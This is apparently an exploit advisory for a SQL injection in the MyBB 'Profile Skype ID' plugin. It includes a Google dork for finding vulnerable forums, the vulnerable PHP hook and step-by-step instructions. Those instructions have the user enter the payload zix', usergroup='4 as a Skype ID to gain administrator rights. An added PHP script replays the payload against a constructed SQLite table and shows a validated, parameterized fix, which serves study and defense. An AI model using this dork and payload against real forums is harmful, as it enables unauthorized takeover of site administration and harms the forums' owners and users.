# Exploit Title: Profile Skype ID MyBB plugin privilege escalation.
# Google Dork: intext:"Skype ID Skype ID:" inurl:member
# Date: 12.20.2012
# Exploit Author: Zixem
# Software Link: http://mods.mybb.com/view/user-profile-skype-id
# Version: 1.0
# Tested on: Linux.
----------------------------------------------


The ProfileSkypeID plugin suffers from SQL injection in an UPDATE query.
The vulnerability exists within profileskype.php, which is located in the /inc/plugins/ folder.

<?php
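// Register the callback that runs whenever a user record is updated.
$plugins->add_hook("datahandler_user_update", "profileskype_update");   /*Line 15*/

// $skype is the user data handler object passed in by the hook.
function profileskype_update($skype)                                    /*Line 167*/
{
    global $mybb;

    if (isset($mybb->input['skype']))
    {
        // Vulnerable: the raw request value is copied into the UPDATE data
        // without escaping or validation.
        $skype->user_update_data['skype'] = $mybb->input['skype'];
    }
}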

?>

How to exploit:
(1) Go to usercp.php?action=profile
(2) Insert the following string in your Skype ID: zix', usergroup='4
(3) Have some fun, you're an admin.


Proof of concept:
(1) Writing the injection: http://i.imgur.com/hg3FW.png
(2) Updating the profile and waiting a few seconds: http://i.imgur.com/fkwdi.png
(3) You're an admin: http://i.imgur.com/JIkRX.png
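
The following PHP script is an added example, not code from the plugin or from MyBB: it replays the Skype ID string above against a constructed SQLite table to show why the unescaped assignment lets one field rewrite usergroup, next to a handler that validates and binds the value. build_update(), update_skype_safe(), group_of(), the table layout and the ID pattern are assumptions made for the illustration; inside MyBB the corresponding fix is to pass the input through $db->escape_string() before assigning it.

```php
<?php
// Added illustration; table layout and helper names are constructed, not MyBB code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE users (uid INTEGER PRIMARY KEY, usergroup INTEGER, skype TEXT)");

// Simplified stand-in for a query builder that wraps each value in quotes
// but leaves escaping to the caller.
function build_update(array $fields, int $uid): string
{
    $set = [];
    foreach ($fields as $name => $value) {
        $set[] = "$name='$value'";
    }
    return 'UPDATE users SET ' . implode(', ', $set) . " WHERE uid=$uid";
}

// Hardened handler: allow-list the format, then bind the value as a parameter.
// The pattern is an assumed Skype-name policy; adjust it to the IDs you accept.
function update_skype_safe(PDO $pdo, int $uid, string $input): bool
{
    if (!preg_match('/\A[A-Za-z][A-Za-z0-9._,-]{5,31}\z/', $input)) {
        return false; // rejected before it reaches SQL
    }
    $stmt = $pdo->prepare('UPDATE users SET skype = :skype WHERE uid = :uid');
    return $stmt->execute([':skype' => $input, ':uid' => $uid]);
}

function group_of(PDO $pdo, int $uid): int
{
    return (int) $pdo->query("SELECT usergroup FROM users WHERE uid=$uid")->fetchColumn();
}

$value = "zix', usergroup='4"; // the string from the advisory

// Unescaped path, as in profileskype_update(): the quote ends the skype
// literal and the rest is parsed as a second column assignment.
$pdo->exec("INSERT INTO users VALUES (1, 2, '')");
$sql = build_update(['skype' => $value], 1);
$pdo->exec($sql);
echo $sql, "\n";
echo 'unescaped: usergroup=', group_of($pdo, 1), "\n";

// Hardened path: the same value fails validation; even without the
// allow-list, binding would store it as plain text in the skype column.
$pdo->exec("INSERT INTO users VALUES (2, 2, '')");
$ok = update_skype_safe($pdo, 2, $value);
echo 'hardened: accepted=', var_export($ok, true), ' usergroup=', group_of($pdo, 2), "\n";
```

Run it with the PHP CLI and the pdo_sqlite extension enabled; the printed UPDATE statement shows the two column assignments produced from the single profile field.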


----------------------------------------------
[*] Follow for more: http://twitter.com/z1xem
[*] http://zixem.altervista.org/
[*] http://zentrixplus.net/